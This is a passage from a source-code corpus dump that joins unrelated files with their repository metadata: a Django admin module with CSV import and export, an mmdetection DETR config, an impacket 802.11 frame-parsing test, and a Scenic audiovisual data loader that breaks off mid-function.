#
#plt.tight_layout()
#plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/tiempos.png')
#plt.show()
| 25.955556
| 119
| 0.702226
|
8c09c9d4e928a8018caea654581182fda804df43
| 3,548
|
py
|
Python
|
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
"""Circle models admin."""
# Django
from django.contrib import admin
from django.http import HttpResponse
# Models
from cride.circles.models import Circle
from cride.rides.models import Ride
# Forms
from .forms import UploadFileForm
# Utilities
import csv
from django.utils import timezone
from datetime import datetime, timedelta
from io import TextIOWrapper
from django.urls import path
from django.shortcuts import render
@admin.register(Circle)
class CircleAdmin(admin.ModelAdmin):
"""Circle model admin."""
list_display = (
'slug_name',
'name',
'is_public',
'verified',
'is_limited',
'members_limit'
)
search_fields = ('slug_name', 'name')
list_filter = (
'is_public',
'verified',
'is_limited'
)
actions = ['make_verified', 'make_unverified', 'download_todays_rides']
def make_verified(self, request, queryset):
"""Make circles verified."""
queryset.update(verified=True)
make_verified.short_description = 'Make selected circles verified'
def make_unverified(self, request, queryset):
"""Make circles unverified."""
queryset.update(verified=False)
make_unverified.short_description = 'Make selected circles unverified'
def get_urls(self):
urls = super(CircleAdmin, self).get_urls()
custom_urls = [
path('import-csv/', self.import_csv)
]
return custom_urls + urls
def import_csv(self, request):
if request.method == 'POST':
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
self.handle_import_csv(request.FILES['file'])
self.message_user(request, "Your csv file has been imported")
else:
form = UploadFileForm()
return render(request, 'admin/circles/circle/csv_form.html', {'form': form})
def handle_import_csv(self, f):
# For more information:
# https://stackoverflow.com/questions/16243023/how-to-resolve-iterator-should-return-strings-not-bytes
file = TextIOWrapper(f.file, encoding='utf-8')
reader = csv.DictReader(file)
for row in reader:
circle = Circle(**row)
circle.save()
def download_todays_rides(self, request, queryset):
"""Return today's rides."""
now = timezone.now()
start = datetime(now.year, now.month, now.day, 0, 0, 0)
end = start + timedelta(days=1)
rides = Ride.objects.filter(
offered_in__in=queryset.values_list('id'),
departure_date__gte=start,
departure_date__lte=end
).order_by('departure_date')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="rides.csv"'
writer = csv.writer(response)
writer.writerow([
'id',
'passengers',
'departure_location',
'departure_date',
'arrival_location',
'arrival_date',
'rating',
])
for ride in rides:
writer.writerow([
ride.pk,
ride.passengers.count(),
ride.departure_location,
str(ride.departure_date),
ride.arrival_location,
str(ride.arrival_date),
ride.rating,
])
return response
download_todays_rides.short_description = 'Download todays rides'
| 29.566667
| 110
| 0.610203
|
6f7e365a4d32d5ec9d122d369fd1cf9fed9d671e
| 6,398
|
py
|
Python
|
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
#import os
#checkpoint = '%s/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth' % os.environ['WORK']
#checkpoint = '/work/mvadera_umass_edu/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth'
checkpoint = '/work/csamplawski_umass_edu/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth'
model = dict(
type='DETR',
freeze_backbone=True,
init_cfg=dict(type='Pretrained', checkpoint=checkpoint),
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(3, ),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
bbox_head=dict(
type='DETRHead',
num_classes=80,
in_channels=2048,
#freeze_transformer=True,
freeze_proj=True,
transformer=dict(
type='Transformer',
freeze_encoder=True,
freeze_decoder=True,
encoder=dict(
type='DetrTransformerEncoder',
num_layers=6,
transformerlayers=dict(
type='BaseTransformerLayer',
attn_cfgs=[
dict(
type='MultiheadAttention',
embed_dims=256,
num_heads=8,
dropout=0.1)
],
feedforward_channels=2048,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'ffn', 'norm'))),
decoder=dict(
type='DetrTransformerDecoder',
return_intermediate=True,
num_layers=6,
transformerlayers=dict(
type='DetrTransformerDecoderLayer',
attn_cfgs=dict(
type='MultiheadAttention',
embed_dims=256,
num_heads=8,
dropout=0.1),
feedforward_channels=2048,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'cross_attn', 'norm',
'ffn', 'norm')),
)),
positional_encoding=dict(
type='SinePositionalEncoding', num_feats=128, normalize=True),
loss_cls=dict(
type='CrossEntropyLoss',
bg_cls_weight=0.1,
use_sigmoid=False,
loss_weight=1.0,
class_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=5.0),
loss_iou=dict(type='GIoULoss', loss_weight=2.0)),
# training and testing settings
train_cfg=dict(
assigner=dict(
type='HungarianAssigner',
cls_cost=dict(type='ClassificationCost', weight=1.),
reg_cost=dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'),
iou_cost=dict(type='IoUCost', iou_mode='giou', weight=2.0))),
test_cfg=dict(max_per_img=100))
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# train_pipeline, NOTE the img_scale and the Pad's size_divisor are different
# from the default setting in mmdet.
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333), (576, 1333),
(608, 1333), (640, 1333), (672, 1333), (704, 1333),
(736, 1333), (768, 1333), (800, 1333)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1333), (500, 1333), (600, 1333)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333),
(576, 1333), (608, 1333), (640, 1333),
(672, 1333), (704, 1333), (736, 1333),
(768, 1333), (800, 1333)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
]
# test_pipeline, NOTE the Pad's size_divisor is different from the default
# setting (size_divisor=32). While there is little effect on the performance
# whether we use the default setting or use size_divisor=1.
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
])
]
data = dict(
samples_per_gpu=16,
workers_per_gpu=2,
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='AdamW',
lr=0.0001,
weight_decay=0.0001,
paramwise_cfg=dict(
custom_keys={'backbone': dict(lr_mult=0.1, decay_mult=1.0)}))
optimizer_config = dict(grad_clip=dict(max_norm=0.1, norm_type=2))
# learning policy
lr_config = dict(policy='step', step=[4])
runner = dict(type='EpochBasedRunner', max_epochs=5)
find_unused_parameters=True
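# Hedged usage note (added, not part of the original config): a config like this is
# normally consumed by mmdetection's standard entry point, e.g.
#   python tools/train.py configs/detr/detr_r50_4x16_5e_output_heads_only.py
# or inspected programmatically with mmcv:
#   from mmcv import Config
#   cfg = Config.fromfile('configs/detr/detr_r50_4x16_5e_output_heads_only.py')
#   cfg.model.freeze_backbone  # True -> only the DETR output heads are trained here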
| 39.012195
| 97
| 0.527352
|
30d656ad469e17fbcc09ac5b61fb35bd1ab10514
| 5,574
|
py
|
Python
|
tests/dot11/test_FrameManagementDisassociation.py
|
S3bastian/impacket
|
6da655ca9ac4f9c2a207ea47e79d089044accd78
|
[
"Apache-1.1"
] | 23
|
2020-02-21T02:44:21.000Z
|
2022-03-03T23:40:32.000Z
|
tests/dot11/test_FrameManagementDisassociation.py
|
cipher9rat/impacket
|
142cacb649b8c6441df9330ac22fe4d15a0d1bbc
|
[
"Apache-1.1"
] | null | null | null |
tests/dot11/test_FrameManagementDisassociation.py
|
cipher9rat/impacket
|
142cacb649b8c6441df9330ac22fe4d15a0d1bbc
|
[
"Apache-1.1"
] | 21
|
2021-06-29T23:14:54.000Z
|
2022-03-24T13:13:58.000Z
|
#!/usr/bin/env python
# sorry, this is very ugly, but I'm in python 2.5
import sys
sys.path.insert(0,"../..")
from impacket.dot11 import Dot11Types
from impacket.ImpactDecoder import RadioTapDecoder
import unittest
from six import PY2
class TestDot11ManagementDisassociationFrames(unittest.TestCase):
def setUp(self):
# 802.11 Management Frame
#
self.rawframe=b"\x00\x00\x1c\x00\xef\x18\x00\x00\xe7\x8a\xec\xb8\x3b\x00\x00\x00\x10\x02\x85\x09\xa0\x00\xb5\x9d\x60\x00\x00\x18\xa0\x00\x3a\x01\x00\x18\xf8\x6c\x76\x42\x70\x1a\x04\x54\xe3\x86\x00\x18\xf8\x6c\x76\x42\x70\x92\x08\x00\xbf\x1b\xa3\xa8"
self.radiotap_decoder = RadioTapDecoder()
radiotap=self.radiotap_decoder.decode(self.rawframe)
if PY2:
self.assertEqual(str(radiotap.__class__), "impacket.dot11.RadioTap")
else:
self.assertEqual(str(radiotap.__class__), "<class 'impacket.dot11.RadioTap'>")
self.dot11=radiotap.child()
if PY2:
self.assertEqual(str(self.dot11.__class__), "impacket.dot11.Dot11")
else:
self.assertEqual(str(self.dot11.__class__), "<class 'impacket.dot11.Dot11'>")
type = self.dot11.get_type()
self.assertEqual(type,Dot11Types.DOT11_TYPE_MANAGEMENT)
subtype = self.dot11.get_subtype()
self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION)
typesubtype = self.dot11.get_type_n_subtype()
self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_MANAGEMENT_SUBTYPE_DISASSOCIATION)
self.management_base=self.dot11.child()
if PY2:
self.assertEqual(str(self.management_base.__class__), "impacket.dot11.Dot11ManagementFrame")
else:
self.assertEqual(str(self.management_base.__class__), "<class 'impacket.dot11.Dot11ManagementFrame'>")
self.management_disassociation=self.management_base.child()
if PY2:
self.assertEqual(str(self.management_disassociation.__class__), "impacket.dot11.Dot11ManagementDisassociation")
else:
self.assertEqual(str(self.management_disassociation.__class__), "<class 'impacket.dot11.Dot11ManagementDisassociation'>")
def test_01(self):
'Test Header and Tail Size field'
self.assertEqual(self.management_base.get_header_size(), 22)
self.assertEqual(self.management_base.get_tail_size(), 0)
self.assertEqual(self.management_disassociation.get_header_size(), 2)
self.assertEqual(self.management_disassociation.get_tail_size(), 0)
def test_02(self):
'Test Duration field'
self.assertEqual(self.management_base.get_duration(), 0x013a)
self.management_base.set_duration(0x1234)
self.assertEqual(self.management_base.get_duration(), 0x1234)
def test_03(self):
'Test Destination Address field'
addr=self.management_base.get_destination_address()
self.assertEqual(addr.tolist(), [0x00,0x18,0xF8,0x6C,0x76,0x42])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_destination_address(addr)
self.assertEqual(self.management_base.get_destination_address().tolist(), [0x12,0x18,0xF8,0x6C,0x76,0x34])
def test_04(self):
'Test Source Address field'
addr=self.management_base.get_source_address()
self.assertEqual(addr.tolist(), [0x70,0x1A,0x04,0x54,0xE3,0x86])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_source_address(addr)
self.assertEqual(self.management_base.get_source_address().tolist(), [0x12,0x1A,0x04,0x54,0xE3,0x34])
def test_05(self):
'Test BSSID Address field'
addr=self.management_base.get_bssid()
self.assertEqual(addr.tolist(), [0x00,0x18,0xF8,0x6C,0x76,0x42])
addr[0]=0x12
addr[5]=0x34
self.management_base.set_bssid(addr)
self.assertEqual(self.management_base.get_bssid().tolist(), [0x12,0x18,0xF8,0x6C,0x76,0x34])
def test_06(self):
'Test Sequence control field'
self.assertEqual(self.management_base.get_sequence_control(), 0x9270)
self.management_base.set_sequence_control(0x1234)
self.assertEqual(self.management_base.get_sequence_control(), 0x1234)
def test_07(self):
'Test Fragment number field'
self.assertEqual(self.management_base.get_fragment_number(), 0x00)
        self.management_base.set_fragment_number(0xF1) # This is a 4-bit field
self.assertEqual(self.management_base.get_fragment_number(), 0x01)
def test_08(self):
'Test Sequence number field'
self.assertEqual(self.management_base.get_sequence_number(), 2343)
        self.management_base.set_sequence_number(0xF234) # This is a 12-bit field
self.assertEqual(self.management_base.get_sequence_number(), 0x0234)
def test_09(self):
'Test Management Frame Data field'
frame_body=b"\x08\x00"
self.assertEqual(self.management_base.get_frame_body(), frame_body)
def test_10(self):
'Test Management Reason Code field'
self.assertEqual(self.management_disassociation.get_reason_code(), 0x0008)
self.management_disassociation.set_reason_code(0x8765)
self.assertEqual(self.management_disassociation.get_reason_code(), 0x8765)
suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11ManagementDisassociationFrames)
unittest.main(defaultTest='suite')
| 42.549618
| 257
| 0.690527
|
838fd1a86ffe51d69bfad262ca4dd73cd1660324
| 22,567
|
py
|
Python
|
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
scenic/projects/mbt/datasets/audiovisual_tfrecord_dataset.py
|
techthiyanes/scenic
|
05585b1189364e29d82413b9d4a50ffa8c246f0c
|
[
"Apache-2.0"
] | null | null | null |
"""TFRecords data-loader for audiovisual datasets."""
import functools
from typing import Dict, Iterator, List, Optional, Text, Tuple, Union
from absl import logging
from dmvr import modalities as load_modalities
from flax import jax_utils
import jax
import jax.numpy as jnp
import ml_collections
import numpy as np
from scenic.dataset_lib import dataset_utils
from scenic.dataset_lib import datasets
from scenic.dataset_lib import video_ops
from scenic.projects.mbt.datasets.dataset_utils import add_spectrogram
from scenic.projects.vivit.data import video_tfrecord_dataset
import tensorflow as tf
# Aliases for custom types:
Batch = Dict[str, jnp.ndarray]
def maybe_pad_batch(batch, train, batch_size, return_as_dict):
"""Zero pad the batch on the right to the batch_size."""
if not return_as_dict:
return dataset_utils.maybe_pad_batch(batch, train, batch_size)
assert 'batch_mask' not in batch
if 'rgb' in batch['inputs']:
unpadded_mask_shape = batch['inputs']['rgb'].shape[0]
batch_pad = batch_size - unpadded_mask_shape
elif 'spectrogram' in batch['inputs']:
unpadded_mask_shape = batch['inputs']['spectrogram'].shape[0]
batch_pad = batch_size - unpadded_mask_shape
else:
raise ValueError('invalid input batch')
if train and batch_pad != 0:
    raise ValueError('In this codebase, we assume that we always drop the '
                     'last partial batch of the train set. Please use '
                     '`drop_remainder=True` for the training set.')
# Most batches will not need padding so we quickly return to avoid slowdown.
if train or batch_pad == 0:
if 'batch_mask' not in batch:
batch['batch_mask'] = np.ones(unpadded_mask_shape, dtype=np.float32)
return batch
def zero_pad(array):
pad_with = [(0, batch_pad)] + [(0, 0)] * (array.ndim - 1)
return np.pad(array, pad_with, mode='constant')
padded_batch = jax.tree_map(zero_pad, batch)
padded_batch_mask = zero_pad(np.ones(unpadded_mask_shape, dtype=np.float32))
padded_batch['batch_mask'] = padded_batch_mask
return padded_batch
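# Added illustration (toy shapes, not real dataset output): an eval batch of 3
# examples padded up to batch_size=4 gains one zero row plus a batch_mask marking
# which rows are real.
def _maybe_pad_batch_example():
  toy = {'inputs': {'rgb': np.zeros((3, 8, 224, 224, 3), np.float32)},
         'label': np.zeros((3, 10), np.float32)}
  padded = maybe_pad_batch(toy, train=False, batch_size=4, return_as_dict=True)
  # padded['inputs']['rgb'].shape == (4, 8, 224, 224, 3)
  # padded['batch_mask'] -> array([1., 1., 1., 0.])
  return padded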
class AVTFRecordDatasetFactory(video_tfrecord_dataset.TFRecordDatasetFactory):
"""Reader for TFRecords using the MediaSequence format.
  The TFRecords already contain images and spectrograms. Spectrograms are
extracted per second and stored with size 128x100 for each second of audio.
"""
_MODALITIES = ('rgb', 'spectrogram')
def __init__(self,
base_dir: str,
tables: Dict[str, Union[str, List[str]]],
num_classes: int,
examples_per_subset: Dict[str, int],
subset: str = 'train',
modalities: Tuple[str] = ('rgb',),
prop_data: float = 1.0,
num_groups: Optional[int] = None,
group_index: Optional[int] = None):
"""Initializes the instance of TFRecordDatasetFactory.
Initializes a data-loader using DeepMind Video Reader (DMVR) pre-processing
(https://github.com/deepmind/dmvr).
TFRecords are assumed to consist of tf.SequenceExample protocol buffers in
the MediaSequence
(https://github.com/google/mediapipe/tree/master/mediapipe/util/sequence)
format.
Args:
base_dir: The base directory of the TFRecords.
tables: A dictionary mapping the subset name (train, val or test) to the
relative path of the SSTable containing them. Follows DMVR convention.
The values of the dictionary can either be a string or a list. If it is
a string, it specifies all the shards in the SSTable. Example -
"/path/to/sstable@10". If passing a list, each entry is a shard of the
SSTable. Example - "[/path/to/sstable_shard_1_of_10, ...,
        /path/to/sstable_shard_10_of_10]." The latter scenario is useful for
debugging.
num_classes: The number of classes in the dataset.
examples_per_subset: A dictionary mapping the subset name (train, val or
test) to the number of examples in the dataset for that subset.
subset: The subset of the dataset to load. Must be a key of "tables"
modalities: Which modality to load. Currently supports 'rgb' and
'spectrogram'
prop_data: The proportion of the data to load. If less than 1.0, this
proportion of the total TFRecord shards are read.
num_groups: If specified will reshard the data according to `num_groups`.
A `group_index` should be specified if using `num_groups`.
group_index: Index of the shard to return after resharding. `num_groups`
should be specified if using `group_index`. This is useful in
distributed setting where one wants to ensure that different data is
read by different workers.
"""
for modality in modalities:
if modality not in AVTFRecordDatasetFactory._MODALITIES:
raise ValueError('Invalid modality %s.' % modality)
self._modalities = modalities
super().__init__(
base_dir=base_dir,
tables=tables,
examples_per_subset=examples_per_subset,
subset=subset,
num_classes=num_classes,
fraction_data=prop_data,
num_groups=num_groups,
group_index=group_index)
def _build(
self,
is_training: bool = True,
# Video related parameters.
num_frames: int = 32,
stride: int = 1,
num_spec_frames: int = 5,
spec_stride: int = 1,
dataset_spec_mean: float = 0.,
dataset_spec_stddev: float = 1.,
num_test_clips: int = 1,
min_resize: int = 256,
crop_size: int = 224,
# Audio related parameters.
spec_shape: Tuple[int, int] = (100, 128),
spec_augment: bool = False,
spec_augment_params=None,
zero_centering_image: bool = False,
# Label related parameters.
one_hot_label: bool = True,
get_label_str: bool = False):
"""Adds DMVR pre-processors to the dataset.
Args:
is_training: whether or not in training mode.
num_frames: number of frames per subclip.
stride: temporal stride to sample frames.
num_spec_frames: number of spectrogram frames.
spec_stride: stride to sample spectrogram.
dataset_spec_mean: Mean of spectrograms in the dataset.
dataset_spec_stddev: Std dev of spectrograms in the dataset.
      num_test_clips: number of test clips (1 by default). If more than one, this
will sample multiple linearly spaced clips within each video at test
time. If 1, then a single clip in the middle of the video is sampled.
min_resize: frames are resized so that min width/height is min_resize.
crop_size: final size of the frame after cropping the resized frames.
spec_shape: input size of spectrogram per frame.
spec_augment: whether to apply augmentation using SpecAugment.
spec_augment_params: parameters for SpecAugment.
zero_centering_image: whether to have images between [-1, 1] or [0, 1].
one_hot_label: whether or not to return one hot version of labels.
get_label_str: whether or not to return label as text.
"""
# We set sync_random_state to True so that sample_offset_proportion is
# the same for all modalities.
if 'rgb' in self._modalities:
load_modalities.add_image(
parser_builder=self.parser_builder,
sampler_builder=self.sampler_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
postprocessor_builder=self.postprocessor_builder,
is_training=is_training,
num_frames=num_frames,
stride=stride,
num_test_clips=num_test_clips,
min_resize=min_resize,
crop_size=crop_size,
zero_centering_image=zero_centering_image,
sync_random_state=True)
if 'spectrogram' in self._modalities:
add_spectrogram(
parser_builder=self.parser_builder,
sampler_builder=self.sampler_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
postprocessor_builder=self.postprocessor_builder,
input_shape=spec_shape,
is_training=is_training,
num_frames=num_spec_frames,
stride=spec_stride,
num_test_clips=num_test_clips,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
zero_centering_image=zero_centering_image,
dataset_mean=dataset_spec_mean,
dataset_stddev=dataset_spec_stddev,
sync_random_state=True)
load_modalities.add_label(
parser_builder=self.parser_builder,
decoder_builder=self.decoder_builder,
preprocessor_builder=self.preprocessor_builder,
is_multi_label=False,
one_hot_label=True,
num_classes=self.num_classes,
add_label_name=False)
def load_split_from_dmvr(ds_factory,
batch_size,
subset='train',
                         modalities=('rgb',),
num_frames=32,
stride=2,
num_spec_frames=5,
spec_stride=1,
num_test_clips=1,
min_resize=256,
crop_size=224,
spec_shape=(100, 128),
dataset_spec_mean=0.,
dataset_spec_stddev=1.,
spec_augment=False,
spec_augment_params=None,
one_hot_label=True,
zero_centering=True,
get_label_str=False,
augmentation_params=None,
keep_key=False):
"""Loads dataset using DMVR for pre-processing.
  DMVR dataset loader already does basic augmentation (random crop and flip) in
  train mode. It also already shuffles and batches the data.
Args:
ds_factory: A DMVR factory to instantiate with the subset.
batch_size: The batch_size to use.
subset: train, validation or test.
modalities: list of input modalities.
num_frames: Number of RGB frames per subclip.
stride: Temporal stride to sample RGB frames.
num_spec_frames: Number of spectrogram frames per subclip.
spec_stride: Temporal stride to sample spectrogram.
num_test_clips: Number of test clips (1 by default). If more than 1, this
will sample multiple linearly spaced clips within each video at test time.
If 1, then a single clip in the middle of the video is sampled. The clips
      are aggregated in the batch dimension.
min_resize: Frames are resized so that min(height, width) is min_resize.
crop_size: Final size of the frame after cropping the resized frames. Both
height and width are the same.
spec_shape: Input size of spectrogram per frame.
dataset_spec_mean: Mean of spectrograms in the dataset.
dataset_spec_stddev: Std dev of spectrograms in the dataset.
spec_augment: whether to apply augmentation using SpecAugment.
spec_augment_params: dict; augmentation configurations for SpecAugment
one_hot_label: If True, return one-hot version of the labels (ie [N, C])
array. Otherwise, return [N]-dimensional array of labels.
zero_centering: If True, frames are normalized to values in [-1, 1]. If
False, values in [0, 1].
    get_label_str: whether or not to return label as text. This does not work on
      TPU.
augmentation_params: dict; augmentation configurations in train mode.
keep_key: bool; If true, also return the key for each example.
Returns:
A pair `(ds, num_examples)` with
ds: A `tf.data.Dataset` object
num_examples: Number of examples in the dataset.
"""
is_training = (subset == 'train')
ds_factory = ds_factory(
subset=subset, modalities=modalities).configure(
is_training=is_training,
num_frames=num_frames,
stride=stride,
num_spec_frames=num_spec_frames,
spec_stride=spec_stride,
num_test_clips=num_test_clips,
min_resize=min_resize,
crop_size=crop_size,
spec_shape=spec_shape,
dataset_spec_mean=dataset_spec_mean,
dataset_spec_stddev=dataset_spec_stddev,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
zero_centering_image=zero_centering,
one_hot_label=one_hot_label,
get_label_str=get_label_str)
if 'rgb' in modalities and is_training and augmentation_params:
# additional augmentation for the RGB features.
ds_factory = video_ops.additional_augmentations(ds_factory,
augmentation_params,
crop_size, num_frames,
zero_centering)
logging.info('Preprocessing graph: %s',
ds_factory.preprocessor_builder.get_summary())
logging.info('Postprocessing graph: %s',
ds_factory.postprocessor_builder.get_summary())
num_examples = ds_factory.num_examples
ds = ds_factory.make_dataset(
batch_size=batch_size,
shuffle=is_training,
num_epochs=None if is_training else 1,
drop_remainder=is_training,
keep_key=(not is_training and keep_key))
if not is_training:
ds = ds.repeat(None)
options = tf.data.Options()
options.experimental_threading.private_threadpool_size = 48
ds = ds.with_options(options)
return ds, num_examples
def map_keys(batch, modalities=('rgb',), return_as_dict=False):
"""DMVR dataset returns 'image' and 'label'. We want 'inputs' and 'label'."""
if not return_as_dict:
if len(modalities) == 1 and modalities[0] == 'rgb':
batch['inputs'] = batch['image']
elif len(modalities) == 1 and modalities[0] == 'spectrogram':
batch['inputs'] = batch['spectrogram']
else:
raise NotImplementedError('modality not supported by map_keys.')
else:
batch['inputs'] = {}
if 'rgb' in modalities:
batch['inputs']['rgb'] = batch['image']
if 'spectrogram' in modalities:
batch['inputs']['spectrogram'] = batch['spectrogram']
return batch
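# Added mini-example (toy arrays): with a single 'rgb' modality the DMVR 'image'
# entry simply becomes 'inputs'.
def _map_keys_example():
  batch = {'image': np.zeros((2, 8)), 'label': np.zeros((2,))}
  return map_keys(batch, modalities=('rgb',))  # batch['inputs'] is batch['image']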
def tile_label_key(batch, return_as_dict=False):
"""Tile labels and keys to match input videos when num_test_clips > 1.
When multiple test crops are used (ie num_test_clips > 1), the batch dimension
  of batch['inputs'] is test_batch_size * num_test_clips.
However, labels and keys remain of size [test_batch_size].
This function repeats label and key to match the inputs.
Args:
batch: Batch from iterator
return_as_dict: Whether to return multimodal inputs as a dictionary.
Returns:
batch: Batch with 'label' and 'key' tiled to match 'inputs'.
"""
if not return_as_dict:
n_repeats = batch['inputs'].shape[0] // batch['label'].shape[0]
elif 'rgb' in batch['inputs']:
n_repeats = batch['inputs']['rgb'].shape[0] // batch['label'].shape[0]
elif 'spectrogram' in batch['inputs']:
n_repeats = (
batch['inputs']['spectrogram'].shape[0] // batch['label'].shape[0])
batch['label'] = np.repeat(batch['label'], n_repeats, axis=0)
if 'key' in batch:
batch['key'] = np.repeat(batch['key'], n_repeats, axis=0)
return batch
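# Added toy sketch: with num_test_clips=2 the inputs have twice the batch dimension
# of the labels, so the labels are repeated to line up with the clips.
def _tile_label_key_example():
  toy = {'inputs': np.zeros((4, 8)), 'label': np.arange(2)}
  return tile_label_key(toy, return_as_dict=False)  # label becomes [0, 0, 1, 1]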
@datasets.add_dataset('audiovisual_tfrecord_dataset')
def get_dataset(
*,
batch_size,
eval_batch_size,
num_shards,
dtype_str='float32',
shuffle_seed=0, # pylint:disable=unused-argument
rng=None,
dataset_configs: ml_collections.ConfigDict,
dataset_service_address: Optional[str] = None):
"""Returns a generator for the audiovisual dataset."""
del rng
modalities = dataset_configs.get('modalities', ['rgb'])
return_as_dict = dataset_configs.get('return_as_dict', False)
# RGB related configs.
num_frames = dataset_configs.get('num_frames', 32)
stride = dataset_configs.get('stride', 2)
min_resize = dataset_configs.get('min_resize', 256)
crop_size = dataset_configs.get('crop_size', 224)
# Spectrogram related configs.
num_spec_frames = dataset_configs.get('num_spec_frames', 5)
spec_stride = dataset_configs.get('spec_stride', 1)
spec_shape = dataset_configs.get('spec_shape', (100, 128))
spec_augment = dataset_configs.get('spec_augment', False)
spec_augment_params = dataset_configs.get('spec_augment_params', None)
dataset_spec_mean = dataset_configs.get('spec_mean', 0.)
dataset_spec_stddev = dataset_configs.get('spec_stddev', 1.)
# General configs.
num_test_clips = dataset_configs.get('num_test_clips', 1)
one_hot_label = dataset_configs.get('one_hot_label', True)
zero_centre_data = dataset_configs.get('zero_centering', True)
augmentation_params = dataset_configs.get('augmentation_params', None)
num_train_val_clips = dataset_configs.get('num_train_val_clips', 1)
do_three_spatial_crops = dataset_configs.get('do_three_spatial_crops', False)
num_spatial_crops = 3 if do_three_spatial_crops else 1
keep_test_key = dataset_configs.get('keep_test_key', False)
test_split = dataset_configs.get('test_split', 'test')
# For the test set, the actual batch size is
# test_batch_size * num_test_clips
test_batch_size = dataset_configs.get('test_batch_size', eval_batch_size)
def validate_config(field):
if dataset_configs.get(field) is None:
raise ValueError(f'{field} must be specified for TFRecord dataset.')
validate_config('base_dir')
validate_config('tables')
validate_config('examples_per_subset')
validate_config('num_classes')
ds_factory = functools.partial(
AVTFRecordDatasetFactory,
base_dir=dataset_configs.base_dir,
tables=dataset_configs.tables,
examples_per_subset=dataset_configs.examples_per_subset,
num_classes=dataset_configs.num_classes,
num_groups=jax.process_count(),
group_index=jax.process_index())
def create_dataset_iterator(
subset: Text,
batch_size_local: int,
num_clips: int,
keep_key_local: bool = False) -> Tuple[Iterator[Batch], int]:
is_training = subset == 'train'
is_test = subset == 'test'
logging.info('Loading split %s', subset)
dataset, num_examples = load_split_from_dmvr(
ds_factory,
batch_size=batch_size_local,
subset=subset,
modalities=modalities,
num_frames=num_frames,
stride=stride,
num_spec_frames=num_spec_frames,
spec_stride=spec_stride,
num_test_clips=num_clips,
min_resize=min_resize,
crop_size=crop_size,
spec_shape=spec_shape,
dataset_spec_mean=dataset_spec_mean,
dataset_spec_stddev=dataset_spec_stddev,
spec_augment=spec_augment,
spec_augment_params=spec_augment_params,
one_hot_label=one_hot_label,
zero_centering=zero_centre_data,
augmentation_params=augmentation_params,
keep_key=keep_key_local)
if dataset_service_address and is_training:
if shuffle_seed is not None:
raise ValueError('Using dataset service with a random seed causes each '
'worker to produce exactly the same data. Add '
'config.shuffle_seed = None to your config if you '
'want to run with dataset service.')
